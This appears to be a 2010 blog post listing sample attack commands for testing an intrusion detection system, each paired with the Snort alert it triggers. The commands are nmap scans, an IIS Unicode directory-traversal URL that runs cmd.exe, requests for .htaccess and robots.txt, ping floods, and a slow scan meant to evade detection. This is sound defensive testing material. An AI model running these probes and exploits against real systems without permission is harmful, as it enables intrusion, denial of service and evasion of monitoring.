Monday, May 10, 2010

Testing IDS with Sample Attacks

Port Scanning

Attacks:
nmap -sS 131.107.1.254
nmap -sU 131.107.1.254
nmap -sT 131.107.1.254

Snort: SNMP AgentX/tcp request -or- SNMP request tcp
Category: Attempted Information Leak

IIS Unicode Directory Traversal Exploit Test

Attack:
http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
press Enter
press Enter

Snort: (http_inspect) DOUBLE DECODING ATTACK
Category: unclassified

Apache Directory Access Test

Attack:
http://131.107.1.254/.htaccess
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/.htaccess
press Enter
press Enter

Snort: WEB-MISC .htaccess access
Category: attempted-recon

Attack:
http://131.107.1.254/robots.txt
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/robots.txt
press Enter
press Enter

Snort: WEB-MISC robots.txt access
Category: web-application-activity

Ping Flood (Simple DoS Attack)

Attack:
ping -l 65000 131.107.1.254 (Windows)
or
ping -s 65000 131.107.1.254 (Linux)

Snort: ICMP L3retriever Ping
Category: attempted-recon

IDS Evasion Attack

Attack:
nmap -sS -PN -p80,443 -T1 131.107.1.254
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)